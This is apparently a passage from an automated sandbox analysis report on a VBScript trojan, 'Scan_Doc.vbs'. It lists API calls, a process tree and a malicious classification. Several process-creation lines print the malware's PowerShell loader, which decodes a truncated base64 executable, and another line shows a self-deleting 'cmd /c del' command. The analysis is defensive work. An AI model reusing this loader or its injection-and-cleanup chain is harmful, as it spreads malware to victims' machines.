          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A400 NtReadFile,3_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A480 NtClose,3_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A530 NtAllocateVirtualMemory,3_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A34A NtCreateFile,3_2_0041A34A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A3FA NtReadFile,3_2_0041A3FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A47D NtClose,3_2_0041A47D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69A20 NtResumeThread,LdrInitializeThunk,3_2_03A69A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_03A69A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69A50 NtCreateFile,LdrInitializeThunk,3_2_03A69A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A699A0 NtCreateSection,LdrInitializeThunk,3_2_03A699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03A69910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A698F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_03A698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03A69860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69840 NtDelayExecution,LdrInitializeThunk,3_2_03A69840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A697A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03A697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69780 NtMapViewOfSection,LdrInitializeThunk,3_2_03A69780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69710 NtQueryInformationToken,LdrInitializeThunk,3_2_03A69710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03A696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03A69660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A695D0 NtClose,LdrInitializeThunk,3_2_03A695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69540 NtReadFile,LdrInitializeThunk,3_2_03A69540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A3B0 NtGetContextThread,3_2_03A6A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69B00 NtSetValueKey,3_2_03A69B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69A80 NtOpenDirectoryObject,3_2_03A69A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69A10 NtQuerySection,3_2_03A69A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A699D0 NtCreateProcessEx,3_2_03A699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69950 NtQueueApcThread,3_2_03A69950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A698A0 NtWriteVirtualMemory,3_2_03A698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69820 NtEnumerateKey,3_2_03A69820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6B040 NtSuspendThread,3_2_03A6B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69FE0 NtCreateMutant,3_2_03A69FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69730 NtQueryVirtualMemory,3_2_03A69730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A710 NtOpenProcessToken,3_2_03A6A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69760 NtOpenProcess,3_2_03A69760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69770 NtSetInformationFile,3_2_03A69770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A770 NtOpenThread,3_2_03A6A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A696D0 NtCreateKey,3_2_03A696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69610 NtEnumerateValueKey,3_2_03A69610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69670 NtQueryInformationProcess,3_2_03A69670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69650 NtQueryValueKey,3_2_03A69650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A695F0 NtQueryInformationFile,3_2_03A695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69520 NtWaitForSingleObject,3_2_03A69520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6AD30 NtSetContextThread,3_2_03A6AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A69560 NtWriteFile,3_2_03A69560
          Source: C:\Windows\explorer.exeCode function: 4_2_07555E12 NtProtectVirtualMemory,4_2_07555E12
          Source: C:\Windows\explorer.exeCode function: 4_2_07554232 NtCreateFile,4_2_07554232
          Source: C:\Windows\explorer.exeCode function: 4_2_07555E0A NtProtectVirtualMemory,4_2_07555E0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599840 NtDelayExecution,LdrInitializeThunk,7_2_04599840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04599860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599540 NtReadFile,LdrInitializeThunk,7_2_04599540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04599910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045995D0 NtClose,LdrInitializeThunk,7_2_045995D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045999A0 NtCreateSection,LdrInitializeThunk,7_2_045999A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599A50 NtCreateFile,LdrInitializeThunk,7_2_04599A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599650 NtQueryValueKey,LdrInitializeThunk,7_2_04599650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04599660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045996D0 NtCreateKey,LdrInitializeThunk,7_2_045996D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045996E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_045996E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599710 NtQueryInformationToken,LdrInitializeThunk,7_2_04599710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599FE0 NtCreateMutant,LdrInitializeThunk,7_2_04599FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599780 NtMapViewOfSection,LdrInitializeThunk,7_2_04599780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459B040 NtSuspendThread,7_2_0459B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599820 NtEnumerateKey,7_2_04599820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045998F0 NtReadVirtualMemory,7_2_045998F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045998A0 NtWriteVirtualMemory,7_2_045998A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599950 NtQueueApcThread,7_2_04599950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599560 NtWriteFile,7_2_04599560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459AD30 NtSetContextThread,7_2_0459AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599520 NtWaitForSingleObject,7_2_04599520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045999D0 NtCreateProcessEx,7_2_045999D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045995F0 NtQueryInformationFile,7_2_045995F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599670 NtQueryInformationProcess,7_2_04599670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599610 NtEnumerateValueKey,7_2_04599610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599A10 NtQuerySection,7_2_04599A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599A00 NtProtectVirtualMemory,7_2_04599A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599A20 NtResumeThread,7_2_04599A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599A80 NtOpenDirectoryObject,7_2_04599A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599770 NtSetInformationFile,7_2_04599770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459A770 NtOpenThread,7_2_0459A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599760 NtOpenProcess,7_2_04599760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459A710 NtOpenProcessToken,7_2_0459A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599B00 NtSetValueKey,7_2_04599B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04599730 NtQueryVirtualMemory,7_2_04599730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459A3B0 NtGetContextThread,7_2_0459A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045997A0 NtUnmapViewOfSection,7_2_045997A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA350 NtCreateFile,7_2_001BA350
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA400 NtReadFile,7_2_001BA400
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA480 NtClose,7_2_001BA480
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA530 NtAllocateVirtualMemory,7_2_001BA530
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA34A NtCreateFile,7_2_001BA34A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA3FA NtReadFile,7_2_001BA3FA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BA47D NtClose,7_2_001BA47D
          Source: Scan_Doc.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_io4xzztc.p5s.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winVBS@11/4@10/6
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: cmmon32.pdb source: svchost.exe, 00000003.00000003.434203339.0000000003417000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434765760.0000000003870000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901605087.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: E:\Folders\Crypter bypass all and vbs e js 13-16-2023 original\Crypter bypass all and vbs e js\Crypter bypass all and vbs e js\Rump Offline new modifiqued\Rump Offline new\bin\Release\obfuscated\Fiber.pdb source: powershell.exe, 00000001.00000002.392901894.00000210918A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.398867984.00000210A9B40000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: svchost.exe, 00000003.00000003.434203339.0000000003417000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434765760.0000000003870000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901605087.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.391679836.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434919800.0000000003B1F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.392837490.0000000003800000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.436155805.0000000004398000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.434602736.00000000041F8000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.391679836.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434919800.0000000003B1F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.392837490.0000000003800000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000007.00000003.436155805.0000000004398000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.434602736.00000000041F8000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: svchost.pdb source: cmmon32.exe, 00000007.00000002.902659095.0000000004A5F000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901229697.00000000006B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: cmmon32.exe, 00000007.00000002.902659095.0000000004A5F000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901229697.00000000006B4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
